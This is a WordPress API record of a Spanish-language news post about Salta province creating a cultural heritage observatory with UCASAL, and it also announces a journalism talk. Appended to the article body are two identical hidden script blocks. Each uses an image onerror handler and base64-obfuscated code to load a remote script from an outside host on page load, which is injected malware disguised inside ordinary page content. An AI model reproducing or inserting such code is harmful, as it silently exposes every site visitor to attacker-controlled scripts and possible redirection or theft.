{"id":3899,"date":"2024-03-26T09:52:43","date_gmt":"2024-03-26T12:52:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3899"},"modified":"2025-08-13T23:57:38","modified_gmt":"2025-08-14T02:57:38","slug":"crearan-el-observatorio-y-laboratorio-de-bienes-patrimoniales-y-culturales-de-la-provincia-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3899","title":{"rendered":"Crear\u00e1n el Observatorio y Laboratorio de Bienes Patrimoniales y Culturales de la Provincia de Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-black-background-color has-text-color has-background has-link-color wp-elements-0434849672d1979de9c2febc2224fb03\"><em>El objetivo de la creaci\u00f3n es el de promover el estudio integral del patrimonio, a trav\u00e9s de actividades cient\u00edficas acad\u00e9micas tendientes a evaluar.<\/em><\/h3>\n\n\n\n<p>La&nbsp;<strong>Secretar\u00eda de Cultura<\/strong>&nbsp;y la carrera de Corredor Inmobiliario y Martillero P\u00fablico de la Facultad de Ciencias Jur\u00eddicas de la UCASAL, crear\u00e1n el Observatorio y Laboratorio de Bienes Patrimoniales y Culturales de la Provincia.<\/p>\n\n\n\n<p>El objetivo de la creaci\u00f3n de este Observatorio que se concreta a trav\u00e9s de gestiones de la Subsecretar\u00eda de Patrimonio Cultural, es el de promover el estudio integral del patrimonio, a trav\u00e9s de actividades cient\u00edficas acad\u00e9micas tendientes a evaluar y valorar los bienes patrimoniales de manera sostenible mediante acciones de gesti\u00f3n conjunta entre las instituciones.<\/p>\n\n\n\n<p>Para avanzar en los detalles del acuerdo, se concret\u00f3 una reuni\u00f3n de la que participaron: la subsecretaria de Patrimonio Cultural, Claudia Lamas; el director general de Preservaci\u00f3n e Investigaci\u00f3n, Christian Vitry; el responsable del \u00e1rea de lucha contra el Tr\u00e1fico Il\u00edcito de Bienes Culturales, Diego Sberna; la directora de la carrera Corredor Inmobiliario y Martillero P\u00fablico de la Facultad de Ciencias Jur\u00eddicas de la UCASAL, Magdalena Muela; el secretario Acad\u00e9mico, &nbsp;Jes\u00fas Rodolfo Bretres; y quien ser\u00e1 la coordinadora del Observatorio, Carolina Diarte.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11464-crearan-el-observatorio-y-laboratorio-de-bienes-patrimoniales-y-culturales-de-la-provincia-de-salta.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11464-crearan-el-observatorio-y-laboratorio-de-bienes-patrimoniales-y-culturales-de-la-provincia-de-salta.jpg\" alt=\"Crear\u00e1n el Observatorio y Laboratorio de Bienes Patrimoniales y Culturales de la Provincia de Salta\" style=\"width:362px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Conversatorio \u201cLibertades, derechos y periodismos\u201d en Explora Salta<\/strong><\/p>\n\n\n\n<p>Ma\u00f1ana mi\u00e9rcoles 27 de marzo, a las 18, en el Complejo Museol\u00f3gico Explora Salta (La Florida 20), tendr\u00e1 lugar el Conversatorio \u201cLibertades, derechos y periodismos\u201d.<\/p>\n\n\n\n<p>El ejercicio del periodismo en Salta se enmarca en un contexto de digitalizaci\u00f3n y aparici\u00f3n permanente de noticias falsas que exigen de la profesi\u00f3n reforzar las bases de su constituci\u00f3n en el marco de leyes nacionales y acuerdos internacionales en defensa de la libertad de prensa y expresi\u00f3n, de acceso a la informaci\u00f3n p\u00fablica y respeto a las audiencias consumidoras de la informaci\u00f3n. Adem\u00e1s de la perspectiva de derechos humanos que se persigue en la difusi\u00f3n de las noticias.<\/p>\n\n\n\n<p>Por ello el conversatorio pretende ser un espacio abierto y de debate, donde se escuchen distintas voces que no s\u00f3lo contextualizan la realidad del periodismo en la capital salte\u00f1a, sino en las localidades fuera de ella. Sumado a c\u00f3mo se visibiliza el ejercicio period\u00edstico en el marco nacional e internacional.<\/p>\n\n\n\n<p>Disertar\u00e1n Natalia Nieto y Facundo Sinatra. Moderar\u00e1 Maira L\u00f3pez.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/crearan-el-observatorio-y-laboratorio-de-bienes-patrimoniales-y-culturales-de-la-provincia-de-salta-94816\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El objetivo de la creaci\u00f3n es el de promover el estudio integral del patrimonio, a trav\u00e9s de actividades cient\u00edficas acad\u00e9micas tendientes a evaluar. La&nbsp;Secretar\u00eda de Cultura&nbsp;y la carrera de Corredor Inmobiliario y Martillero P\u00fablico de la Facultad de Ciencias Jur\u00eddicas de la UCASAL, crear\u00e1n el Observatorio y Laboratorio de Bienes Patrimoniales y Culturales de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3900,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3899","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3899"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3899"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3899\/revisions"}],"predecessor-version":[{"id":6810,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3899\/revisions\/6810"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3900"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3899"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3899"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3899"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}